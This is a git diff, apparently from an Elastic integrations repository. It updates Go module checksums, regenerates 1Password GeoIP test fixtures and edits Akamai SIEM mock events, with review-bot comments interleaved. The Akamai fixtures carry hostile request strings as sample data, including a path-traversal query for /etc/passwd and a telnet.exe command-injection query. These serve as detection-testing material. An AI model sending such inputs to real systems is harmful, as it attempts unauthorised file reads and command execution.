h1:ezvh/TsK7cY6rbqRK0oQQ8IAqLxYwwyPxAX1Pzy0ii0= k8s.io/gengo v0.0.0-20201214224949-b6c5ce23f027/go.mod h1:FiNAH4ZV3gBg2Kwh89tzAEV2be7d5xI0vBa/VySYy3E= +k8s.io/gengo v0.0.0-20210813121822-485abfe95c7c/go.mod h1:FiNAH4ZV3gBg2Kwh89tzAEV2be7d5xI0vBa/VySYy3E= k8s.io/klog/v2 v2.0.0/go.mod h1:PBfzABfn139FHAV07az/IF9Wp1bkk3vpT2XSJ76fSDE= k8s.io/klog/v2 v2.2.0/go.mod h1:Od+F08eJP+W3HUb4pSrPpgp9DGU4GzlpG/TmITuYh/Y= k8s.io/klog/v2 v2.4.0/go.mod h1:Od+F08eJP+W3HUb4pSrPpgp9DGU4GzlpG/TmITuYh/Y= -k8s.io/klog/v2 v2.9.0 h1:D7HV+n1V57XeZ0m6tdRkfknthUaM06VFbWldOFh8kzM= k8s.io/klog/v2 v2.9.0/go.mod h1:hy9LJ/NvuK+iVyP4Ehqva4HxZG/oXyIS3n3Jmire4Ec= +k8s.io/klog/v2 v2.30.0 h1:bUO6drIvCIsvZ/XFgfxoGFQU/a4Qkh0iAlvUR7vlHJw= +k8s.io/klog/v2 v2.30.0/go.mod 
h1:y1WjHnz7Dj687irZUWR/WLkLc5N1YHtjLdmgWjndZn0= k8s.io/kube-openapi v0.0.0-20201113171705-d219536bb9fd/go.mod h1:WOJ3KddDSol4tAGcJo0Tvi+dK12EcqSLqcWsryKMpfM= -k8s.io/kube-openapi v0.0.0-20210421082810-95288971da7e h1:KLHHjkdQFomZy8+06csTWZ0m1343QqxZhR2LJ1OxCYM= k8s.io/kube-openapi v0.0.0-20210421082810-95288971da7e/go.mod h1:vHXdDvt9+2spS2Rx9ql3I8tycm3H9FDfdUoIuKCefvw= -k8s.io/kubectl v0.22.1 h1:kpXO+ajPNTzAVLDM9pAzCsWH9MtCMr92zpcvXMt7P6E= -k8s.io/kubectl v0.22.1/go.mod h1:mjAOgEbMNMtZWxnfM6jd+nPjPsaoLqO5xanc78WcSbw= +k8s.io/kube-openapi v0.0.0-20211109043538-20434351676c/go.mod h1:vHXdDvt9+2spS2Rx9ql3I8tycm3H9FDfdUoIuKCefvw= +k8s.io/kube-openapi v0.0.0-20211115234752-e816edb12b65 h1:E3J9oCLlaobFUqsjG9DfKbP2BmgwBL2p7pn0A3dG9W4= +k8s.io/kube-openapi v0.0.0-20211115234752-e816edb12b65/go.mod h1:sX9MT8g7NVZM5lVL/j8QyCCJe8YSMW30QvGZWaCIDIk= +k8s.io/kubectl v0.22.4/go.mod h1:ok2qRT6y2Gy4+y+mniJVyUMKeBHP4OWS9Rdtf/QTM5I= +k8s.io/kubectl v0.23.0 h1:WABWfj+Z4tC3SfKBCtZr5sIVHsFtkU9Azii4DR9IT6Y= +k8s.io/kubectl v0.23.0/go.mod h1:TfcGEs3u4dkmoC2eku1GYymdGaMtPMcaLLFrX/RB2kI= k8s.io/kubernetes v1.13.0/go.mod h1:ocZa8+6APFNC2tX1DZASIbocyYT5jHzqFVsY5aoB7Jk= -k8s.io/metrics v0.22.1/go.mod h1:i/ZNap89UkV1gLa26dn7fhKAdheJaKy+moOqJbiif7E= +k8s.io/metrics v0.22.4/go.mod h1:6F/iwuYb1w2QDCoHkeMFLf4pwHBcYKLm4mPtVHKYrIw= +k8s.io/metrics v0.23.0/go.mod h1:NDiZTwppEtAuKJ1Rxt3S4dhyRzdp6yUcJf0vo023dPo= k8s.io/utils v0.0.0-20201110183641-67b214c5f920/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= -k8s.io/utils v0.0.0-20210707171843-4b05e18ac7d9/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= -k8s.io/utils v0.0.0-20210819203725-bdf08cb9a70a h1:8dYfu/Fc9Gz2rNJKB9IQRGgQOh2clmRzNIPPY1xLY5g= +k8s.io/utils v0.0.0-20210802155522-efc7438f0176/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= k8s.io/utils v0.0.0-20210819203725-bdf08cb9a70a/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= +k8s.io/utils v0.0.0-20210930125809-cb0fa318a74b/go.mod 
h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= +k8s.io/utils v0.0.0-20211208161948-7d6a63dca704 h1:ZKMMxTvduyf5WUtREOqg5LiXaN1KO/+0oOQPRFrClpo= +k8s.io/utils v0.0.0-20211208161948-7d6a63dca704/go.mod h1:jPW/WVKK9YHAvNhRxK0md/EJ228hCsBRufyofKtW8HA= oras.land/oras-go v0.4.0/go.mod h1:VJcU+VE4rkclUbum5C0O7deEZbBYnsnpbGSACwTjOcg= rsc.io/binaryregexp v0.2.0/go.mod h1:qTv7/COck+e2FymRvadv62gMdZztPaShugOCi3I+8D8= rsc.io/letsencrypt v0.0.3/go.mod h1:buyQKZ6IXrRnB7TdkHP0RyEybLx18HHyOSoTyoOLqNY= 
@@ -1678,16 +1777,26 @@ rsc.io/sampler v1.3.0/go.mod h1:T1hPZKmBbMNahiBKFy5HrXp6adAjACjK9JXDnKaTXpA= sigs.k8s.io/apiserver-network-proxy/konnectivity-client v0.0.14/go.mod h1:LEScyzhFmoF5pso/YSeBstl57mOzx9xlU9n85RGrDQg= sigs.k8s.io/apiserver-network-proxy/konnectivity-client v0.0.15/go.mod h1:LEScyzhFmoF5pso/YSeBstl57mOzx9xlU9n85RGrDQg= sigs.k8s.io/apiserver-network-proxy/konnectivity-client v0.0.22/go.mod h1:LEScyzhFmoF5pso/YSeBstl57mOzx9xlU9n85RGrDQg= -sigs.k8s.io/kustomize/api v0.8.11 h1:LzQzlq6Z023b+mBtc6v72N2mSHYmN8x7ssgbf/hv0H8= +sigs.k8s.io/apiserver-network-proxy/konnectivity-client v0.0.25/go.mod h1:Mlj9PNLmG9bZ6BHFwFKDo5afkpWyUISkb9Me0GnK66I= +sigs.k8s.io/json v0.0.0-20211020170558-c049b76a60c6/go.mod h1:p4QtZmO4uMYipTQNzagwnNoseA6OxSUutVw05NhYDRs= +sigs.k8s.io/json v0.0.0-20211208200746-9f7c6b3444d2 h1:kDi4JBNAsJWfz1aEXhO8Jg87JJaPNLh5tIzYHgStQ9Y= +sigs.k8s.io/json v0.0.0-20211208200746-9f7c6b3444d2/go.mod h1:B+TnT182UBxE84DiCz4CVE26eOSDAeYCpfDnC2kdKMY= sigs.k8s.io/kustomize/api v0.8.11/go.mod h1:a77Ls36JdfCWojpUqR6m60pdGY1AYFix4AH83nJtY1g= +sigs.k8s.io/kustomize/api v0.10.1 h1:KgU7hfYoscuqag84kxtzKdEC3mKMb99DPI3a0eaV1d0= +sigs.k8s.io/kustomize/api v0.10.1/go.mod h1:2FigT1QN6xKdcnGS2Ppp1uIWrtWN28Ms8A3OZUZhwr8= sigs.k8s.io/kustomize/cmd/config v0.9.13/go.mod h1:7547FLF8W/lTaDf0BDqFTbZxM9zqwEJqCKN9sSR0xSs= +sigs.k8s.io/kustomize/cmd/config v0.10.2/go.mod h1:K2aW7nXJ0AaT+VA/eO0/dzFLxmpFcTzudmAgDwPY1HQ= sigs.k8s.io/kustomize/kustomize/v4 v4.2.0/go.mod h1:MOkR6fmhwG7hEDRXBYELTi5GSFcLwfqwzTRHW3kv5go= -sigs.k8s.io/kustomize/kyaml v0.11.0 h1:9KhiCPKaVyuPcgOLJXkvytOvjMJLoxpjodiycb4gHsA= +sigs.k8s.io/kustomize/kustomize/v4 v4.4.1/go.mod h1:qOKJMMz2mBP+vcS7vK+mNz4HBLjaQSWRY22EF6Tb7Io= sigs.k8s.io/kustomize/kyaml v0.11.0/go.mod h1:GNMwjim4Ypgp/MueD3zXHLRJEjz7RvtPae0AwlvEMFM= +sigs.k8s.io/kustomize/kyaml v0.13.0 h1:9c+ETyNfSrVhxvphs+K2dzT3dh5oVPPEqPOE/cUpScY= +sigs.k8s.io/kustomize/kyaml v0.13.0/go.mod h1:FTJxEZ86ScK184NpGSAQcfEqee0nul8oLCK30D47m4E= 
sigs.k8s.io/structured-merge-diff/v4 v4.0.2/go.mod h1:bJZC9H9iH24zzfZ/41RGcq60oK1F7G282QMXDPYydCw= sigs.k8s.io/structured-merge-diff/v4 v4.0.3/go.mod h1:bJZC9H9iH24zzfZ/41RGcq60oK1F7G282QMXDPYydCw= -sigs.k8s.io/structured-merge-diff/v4 v4.1.2 h1:Hr/htKFmJEbtMgS/UD0N+gtgctAqz81t3nu+sPzynno= sigs.k8s.io/structured-merge-diff/v4 v4.1.2/go.mod h1:j/nl6xW8vLS49O8YvXW1ocPhZawJtm+Yrr7PPRQ0Vg4= +sigs.k8s.io/structured-merge-diff/v4 v4.2.0 h1:kDvPBbnPk+qYmkHmSo8vKGp438IASWofnbbUKDE/bv0= +sigs.k8s.io/structured-merge-diff/v4 v4.2.0/go.mod h1:j/nl6xW8vLS49O8YvXW1ocPhZawJtm+Yrr7PPRQ0Vg4= sigs.k8s.io/yaml v1.1.0/go.mod h1:UJmg0vDUVViEyp3mgSv9WPwZCDxu4rQW1olrI1uml+o= -sigs.k8s.io/yaml v1.2.0 h1:kr/MCeFWJWTwyaHoR9c8EjH9OumOmoF9YGiZd7lFm/Q= sigs.k8s.io/yaml v1.2.0/go.mod h1:yfXDCHCao9+ENCvLSE62v9VSji2MKu5jeNfTrofGhJc= +sigs.k8s.io/yaml v1.3.0 h1:a2VclLzOGrwOHDiV8EfBGhvjHvP46CtW5j6POvhYGGo= +sigs.k8s.io/yaml v1.3.0/go.mod h1:GeOyir5tyXNByN85N/dRIT9es5UQNerPYEKK56eTBm8= diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml index 3ae475f53fd..d07d03ec49b 100644 --- a/packages/1password/changelog.yml +++ b/packages/1password/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json index c5e3363a0aa..03c1f4e45a8 100644 --- a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json +++ b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json 
@@ -34,14 +34,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -53,7 +53,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:30:28.123174500Z",
+ "ingested": "2021-12-14T14:34:03.382903193Z",
 "original": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}",
 "category": [
 "file"
@@ -107,14 +107,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
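Review bot: The `event.ingested` replacement in hunk `@@ -53,7 +53,7 @@` (`"ingested": "2021-12-14T14:34:03.382903193Z"`) pins a wall-clock value into the expected output, so this line will churn on every regeneration and mixes noise into a diff whose purpose is the GeoIP correction. The same applies to `@@ -126,7 +126,7 @@` in this file and to `@@ -54,7 +54,7 @@` and `@@ -130,7 +130,7 @@` in test-signinattempts.json-expected.json. If the pipeline test config for these data streams does not already list `event.ingested` under `dynamic_fields`, adding it there would keep the fixtures stable across regenerations; those config files are not part of this diff, so confirm before changing them.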
@@ -126,7 +126,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:30:28.123178700Z",
+ "ingested": "2021-12-14T14:34:03.382906002Z",
 "original": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}",
 "category": [
 "file"
diff --git a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
index 42bc15c2db4..12d9ae5c4b8 100644
--- a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
+++ b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
@@ -35,14 +35,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -54,7 +54,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:30:28.577677500Z",
+ "ingested": "2021-12-14T14:34:03.790583740Z",
 "original": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}",
 "created": "2021-08-30T22:57:42.484Z",
 "kind": "event",
@@ -111,14 +111,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "SE-AB",
- "city_name": "Tumba",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
 "country_iso_code": "SE",
 "country_name": "Sweden",
- "region_name": "Stockholm",
+ "region_name": "Östergötland County",
 "location": {
- "lon": 17.8167,
- "lat": 59.2
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
@@ -130,7 +130,7 @@
 "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-12-09T13:30:28.577687Z",
+ "ingested": "2021-12-14T14:34:03.790586281Z",
 "original": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}",
 "created": "2021-08-30T22:57:42.484Z",
 "kind": "event",
diff --git a/packages/1password/manifest.yml b/packages/1password/manifest.yml
index d2cfdae6fe6..0a254f0d641 100644
--- a/packages/1password/manifest.yml
+++ b/packages/1password/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: 1password
 title: "1Password Events Reporting"
-version: 0.2.1
+version: 0.2.2
 license: basic
 description: Collect events from 1Password Events API with Elastic Agent.
 type: integration
diff --git a/packages/akamai/_dev/deploy/docker/files/config.yml b/packages/akamai/_dev/deploy/docker/files/config.yml
index c9e173a28d6..84ee8be0c8c 100644
--- a/packages/akamai/_dev/deploy/docker/files/config.yml
+++ b/packages/akamai/_dev/deploy/docker/files/config.yml
@@ -8,8 +8,8 @@ rules: responses: - status_code: 200 body: |- - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c091","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 
gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f331","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} + {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R 
","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c091","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} + {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV 
VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f331","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - path: /siem/v1/configs/aaaa methods: ["GET"] request_headers: 
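Review bot: The replacement client address 89.160.20.156 no longer agrees with the vendor-supplied `geo` object the same mocked event still carries (`"asn":"14618","city":"ASHBURN",...,"regionCode":"VA"`), while the regenerated expected output resolves the address to Linköping / AS 29518, so the fixture now only exercises GeoIP enrichment of `clientIP` and drops the case where the event's own geo block and the address are consistent. The same applies to the second route of this file in the following hunk and to the test-http-json.log hunk. If the ingest pipeline is meant to prefer the vendor `geo` fields over the GeoIP processor (the pipeline itself is not visible here), the regenerated expected files would mask that precedence rather than pin it; consider either aligning the embedded `geo` values with the new address or keeping one event where the two deliberately disagree so the chosen precedence is asserted explicitly. Moving from a live cloud-provider address (AS 14618, Amazon) to one that resolves in the GeoIP test database is otherwise the right change, since it makes the enrichment deterministic; note that the enclosing `rules:` list begins before this hunk.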
@@ -20,6 +20,6 @@ rules: responses: - status_code: 200 body: |- - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"52.91.36.10","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 
